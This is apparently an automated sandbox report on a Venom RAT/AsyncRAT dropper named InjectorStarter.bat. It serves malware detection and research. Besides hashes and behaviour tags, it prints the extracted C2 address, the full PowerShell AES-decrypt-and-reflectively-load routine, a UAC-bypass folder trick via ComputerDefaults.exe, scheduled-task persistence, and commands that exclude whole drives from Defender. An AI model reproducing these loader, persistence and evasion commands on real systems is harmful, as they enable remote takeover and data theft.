Overview
overview
10Static
static
10Guna.UI2.dll
windows7-x64
1Guna.UI2.dll
windows10-2004-x64
1InjectorStarter.bat
windows7-x64
1InjectorStarter.bat
windows10-2004-x64
10Newtonsoft.Json.dll
windows7-x64
1Newtonsoft.Json.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/api-ms...-0.dll
windows10-2004-x64
1bin/clrcom...on.dll
windows7-x64
1bin/clrcom...on.dll
windows10-2004-x64
1bin/clretwrc.dll
windows7-x64
1bin/clretwrc.dll
windows10-2004-x64
1dnlib.dll
windows7-x64
1dnlib.dll
windows10-2004-x64
1Analysis
-
max time kernel
133s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
14-09-2024 01:32
Behavioral task
behavioral1
Sample
Guna.UI2.dll
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Guna.UI2.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
InjectorStarter.bat
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
InjectorStarter.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Newtonsoft.Json.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Newtonsoft.Json.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
bin/api-ms-win-crt-heap-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral8
Sample
bin/api-ms-win-crt-locale-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
bin/api-ms-win-crt-math-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral10
Sample
bin/api-ms-win-crt-multibyte-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
bin/api-ms-win-crt-private-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral12
Sample
bin/api-ms-win-crt-process-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
bin/api-ms-win-crt-runtime-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral14
Sample
bin/api-ms-win-crt-stdio-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
bin/api-ms-win-crt-string-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral16
Sample
bin/api-ms-win-crt-time-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
bin/api-ms-win-crt-utility-l1-1-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral18
Sample
bin/clrcompression.dll
Resource
win7-20240903-en
Behavioral task
behavioral19
Sample
bin/clrcompression.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral20
Sample
bin/clretwrc.dll
Resource
win7-20240903-en
Behavioral task
behavioral21
Sample
bin/clretwrc.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral22
Sample
dnlib.dll
Resource
win7-20240903-en
Behavioral task
behavioral23
Sample
dnlib.dll
Resource
win10v2004-20240802-en
General
-
Target
InjectorStarter.bat
-
Size
167KB
-
MD5
46d96a835e60ee73339082c3c7eb62cc
-
SHA1
b9c668ea33db469cd1ed60bd8d31e5347975a72c
-
SHA256
c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a
-
SHA512
ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497
-
SSDEEP
3072:rKTAIOdL6ZlESFX0Wb8s7CqRa8gZbN8/Z2LfvTijJij6wTKGJWD:tlumcVb8sOqRbgA/Cf8+6Sq
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.2
Default
41.216.183.109:4449
eqrgkllk45thea
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral4/memory/4820-118-0x00000234FC190000-0x00000234FC1A8000-memory.dmp family_asyncrat -
Blocklisted process makes network request 6 IoCs
flow pid Process 19 4820 powershell.exe 34 4820 powershell.exe 37 4820 powershell.exe 39 4820 powershell.exe 44 4820 powershell.exe 45 4820 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4112 powershell.exe 232 powershell.exe 4028 powershell.exe 2924 powershell.exe 3548 powershell.exe 3236 powershell.exe 1296 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2488 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
pid Process 2488 ComputerDefaults.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 440 powershell.exe 440 powershell.exe 3548 powershell.exe 3548 powershell.exe 4820 powershell.exe 4820 powershell.exe 4820 powershell.exe 3236 powershell.exe 3236 powershell.exe 3236 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 4028 powershell.exe 4028 powershell.exe 4028 powershell.exe 232 powershell.exe 232 powershell.exe 232 powershell.exe 4820 powershell.exe 4820 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 2924 powershell.exe 2924 powershell.exe 2924 powershell.exe 4112 powershell.exe 4112 powershell.exe 4112 powershell.exe 4820 powershell.exe 4820 powershell.exe 4820 powershell.exe 4820 powershell.exe 4820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 440 powershell.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeDebugPrivilege 4820 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeIncreaseQuotaPrivilege 1676 powershell.exe Token: SeSecurityPrivilege 1676 powershell.exe Token: SeTakeOwnershipPrivilege 1676 powershell.exe Token: SeLoadDriverPrivilege 1676 powershell.exe Token: SeSystemProfilePrivilege 1676 powershell.exe Token: SeSystemtimePrivilege 1676 powershell.exe Token: SeProfSingleProcessPrivilege 1676 powershell.exe Token: SeIncBasePriorityPrivilege 1676 powershell.exe Token: SeCreatePagefilePrivilege 1676 powershell.exe Token: SeBackupPrivilege 1676 powershell.exe Token: SeRestorePrivilege 1676 powershell.exe Token: SeShutdownPrivilege 1676 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeSystemEnvironmentPrivilege 1676 powershell.exe Token: SeRemoteShutdownPrivilege 1676 powershell.exe Token: SeUndockPrivilege 1676 powershell.exe Token: SeManageVolumePrivilege 1676 powershell.exe Token: 33 1676 powershell.exe Token: 34 1676 powershell.exe Token: 35 1676 powershell.exe Token: 36 1676 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeIncreaseQuotaPrivilege 4028 powershell.exe Token: SeSecurityPrivilege 4028 powershell.exe Token: SeTakeOwnershipPrivilege 4028 powershell.exe Token: SeLoadDriverPrivilege 4028 powershell.exe Token: SeSystemProfilePrivilege 4028 powershell.exe Token: SeSystemtimePrivilege 4028 powershell.exe Token: SeProfSingleProcessPrivilege 4028 powershell.exe Token: SeIncBasePriorityPrivilege 4028 powershell.exe Token: SeCreatePagefilePrivilege 4028 powershell.exe Token: SeBackupPrivilege 4028 powershell.exe Token: SeRestorePrivilege 4028 powershell.exe Token: SeShutdownPrivilege 4028 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeSystemEnvironmentPrivilege 4028 powershell.exe Token: SeRemoteShutdownPrivilege 4028 powershell.exe Token: SeUndockPrivilege 4028 powershell.exe Token: SeManageVolumePrivilege 4028 powershell.exe Token: 33 4028 powershell.exe Token: 34 4028 powershell.exe Token: 35 4028 powershell.exe Token: 36 4028 powershell.exe Token: SeIncreaseQuotaPrivilege 4028 powershell.exe Token: SeSecurityPrivilege 4028 powershell.exe Token: SeTakeOwnershipPrivilege 4028 powershell.exe Token: SeLoadDriverPrivilege 4028 powershell.exe Token: SeSystemProfilePrivilege 4028 powershell.exe Token: SeSystemtimePrivilege 4028 powershell.exe Token: SeProfSingleProcessPrivilege 4028 powershell.exe Token: SeIncBasePriorityPrivilege 4028 powershell.exe Token: SeCreatePagefilePrivilege 4028 powershell.exe Token: SeBackupPrivilege 4028 powershell.exe Token: SeRestorePrivilege 4028 powershell.exe Token: SeShutdownPrivilege 4028 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeSystemEnvironmentPrivilege 4028 powershell.exe Token: SeRemoteShutdownPrivilege 4028 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4820 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 4508 wrote to memory of 3616 4508 cmd.exe 87 PID 4508 wrote to memory of 3616 4508 cmd.exe 87 PID 4508 wrote to memory of 440 4508 cmd.exe 88 PID 4508 wrote to memory of 440 4508 cmd.exe 88 PID 440 wrote to memory of 3548 440 powershell.exe 91 PID 440 wrote to memory of 3548 440 powershell.exe 91 PID 440 wrote to memory of 5100 440 powershell.exe 94 PID 440 wrote to memory of 5100 440 powershell.exe 94 PID 5100 wrote to memory of 2488 5100 cmd.exe 96 PID 5100 wrote to memory of 2488 5100 cmd.exe 96 PID 2488 wrote to memory of 2188 2488 ComputerDefaults.exe 97 PID 2488 wrote to memory of 2188 2488 ComputerDefaults.exe 97 PID 2188 wrote to memory of 5012 2188 cmd.exe 99 PID 2188 wrote to memory of 5012 2188 cmd.exe 99 PID 2188 wrote to memory of 4820 2188 cmd.exe 100 PID 2188 wrote to memory of 4820 2188 cmd.exe 100 PID 4820 wrote to memory of 3236 4820 powershell.exe 101 PID 4820 wrote to memory of 3236 4820 powershell.exe 101 PID 4820 wrote to memory of 1296 4820 powershell.exe 103 PID 4820 wrote to memory of 1296 4820 powershell.exe 103 PID 4820 wrote to memory of 1676 4820 powershell.exe 105 PID 4820 wrote to memory of 1676 4820 powershell.exe 105 PID 4820 wrote to memory of 4028 4820 powershell.exe 107 PID 4820 wrote to memory of 4028 4820 powershell.exe 107 PID 4820 wrote to memory of 232 4820 powershell.exe 111 PID 4820 wrote to memory of 232 4820 powershell.exe 111 PID 440 wrote to memory of 5032 440 powershell.exe 113 PID 440 wrote to memory of 5032 440 powershell.exe 113 PID 440 wrote to memory of 1712 440 powershell.exe 115 PID 440 wrote to memory of 1712 440 powershell.exe 115 PID 440 wrote to memory of 2924 440 powershell.exe 117 PID 440 wrote to memory of 2924 440 powershell.exe 117 PID 440 wrote to memory of 4112 440 powershell.exe 119 PID 440 wrote to memory of 4112 440 powershell.exe 119
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ='); $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GkmdP=New-Object System.IO.MemoryStream(,$param_var); $hiwNw=New-Object System.IO.MemoryStream; $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress); $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose(); $hiwNw.ToArray();}function execute_function($param_var,$param2_var){ $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var); $SUZbj=$PazRF.EntryPoint; $SUZbj.Invoke($null, $param2_var);}$ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat';$host.UI.RawUI.WindowTitle = $ZeAWF;$dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}$payloads_var=[string[]]$UhuSz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:3616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c SC.cmd5⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ='); $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GkmdP=New-Object System.IO.MemoryStream(,$param_var); $hiwNw=New-Object System.IO.MemoryStream; $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress); $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose(); $hiwNw.ToArray();}function execute_function($param_var,$param2_var){ $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var); $SUZbj=$PazRF.EntryPoint; $SUZbj.Invoke($null, $param2_var);}$ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ZeAWF;$dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}$payloads_var=[string[]]$UhuSz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "6⤵PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:232
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q3⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\InjectorStarter')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4112
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
2KB
MD5e4de99c1795fd54aa87da05fa39c199c
SHA1dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
SHA25623c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
SHA512796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926
-
Filesize
1KB
MD54373abae4880a277a3859f5734143a19
SHA1a71759a565541fba5e1ee8d3fceee7645ed75054
SHA256f151ef7e7996f479ba2ab9334d50ff36ae85917c4451614a254b121d328eb607
SHA5120af72c0f2ff8716e99a84e67ef4bb921e389459b90f76ca17340384aabcdf41a10c2191801c8d343b649cb547ea8182ca367b7aa6176d7304394be4b9bfe8718
-
Filesize
1KB
MD581b640502b0c25ab216c6b6ad82ba7bd
SHA11b43e1fead8428aee3b764bcacc3795021277be9
SHA2564cf92d978f2a1fc5b80eda8a11f181603018d270fc8fe24daa634b954c75380f
SHA512842cfba04ddbd5336e16dbc1ab8e57a80541f0ab1da6260fcca53f7f441e4b1c4149bce2d74b23684a338a86aded2626008f33edb246871e178bda1272c8fa57
-
Filesize
944B
MD5c4bac001ce1ea76036b69ef6920fffe1
SHA1ce176b38f2ee4b300cbec04592f70b65b45491ed
SHA2562895ccfe721a7d966bb407b4bb713320d3fb11ceb793fcc84a751abb755ca1c6
SHA512e8616fb64a420202573cad3253b5714816b09522c8f466d0a42b77701d911146f501e3ec06e0b7d79f56d42ea2cc25c642ff64f57242bb609db039484b12ddc3
-
Filesize
1KB
MD5721b5709e8cf707b3371e9dcec3f8dbe
SHA1dca34cbf05583bd4ee731e732c0ff993eb4cfd13
SHA256df5a6fc77d68de7db1bc06f5f1f9609fb27df5ee90d57f7766860cb3bef14f43
SHA512ffcdce04c34fe269f898e599b95fff2306f9ab5e68e0255cb4c80cffedf262a0567b563317a94110e9f10467a5a340a71da83d0439b37d9e83ce76c5def8ca3d
-
Filesize
1KB
MD573aa7bac9a76981286ae4d6ac4734b2d
SHA16deb0456dbe856792c66e803427b599311fdda23
SHA25684397e930607b63ba9cfe6c4a4c472eb66d074526b8fe48d15856bc1a649aba6
SHA5120dcc91f38e59259a4217b27746a66b7a6dec07ade9478fcbdedcd21eecbf584175a2e12d48ea6945ddfa81ee24dd0de17b154225f32aaed7f730bf64474745d9
-
Filesize
664B
MD5c5a924d29f846b1d81e3c4df6cf310d0
SHA1e0cfbbf4666d649d229322c82ae6c1f3dda6c63a
SHA256a08aca12c8c39b70f38089a2009f7db55afaeb928eda54436a65ebfa9539e66d
SHA512f2a292dbb2c6e37d4adee20a1172f445fbf965dcea89e37827b84eb569a1045ee359267d5e6c7b326dcfbacbd96e410d4b6cdbdcd82a9d359501208415ed1158
-
Filesize
167KB
MD546d96a835e60ee73339082c3c7eb62cc
SHA1b9c668ea33db469cd1ed60bd8d31e5347975a72c
SHA256c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a
SHA512ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
Filesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
Filesize
103KB
MD5d4f7ff46bb9412b90e8f091f6a9115c3
SHA1e7c82eca0bd2c9969b036efd07bfb6a1e3a342cd
SHA25653493edddf3e4509f791d0e26ea80d8b2283aa95a0f4e263ebb8fc1e7d8d9c82
SHA5127bf7a9424f8540d4f867c53c3042fc91c7c4bf09f8c790d664908c61cce3d32a16fa286fff2d5b9aed3c25f645fdba50a2c91030eea9da1e8e7215c414e32a0d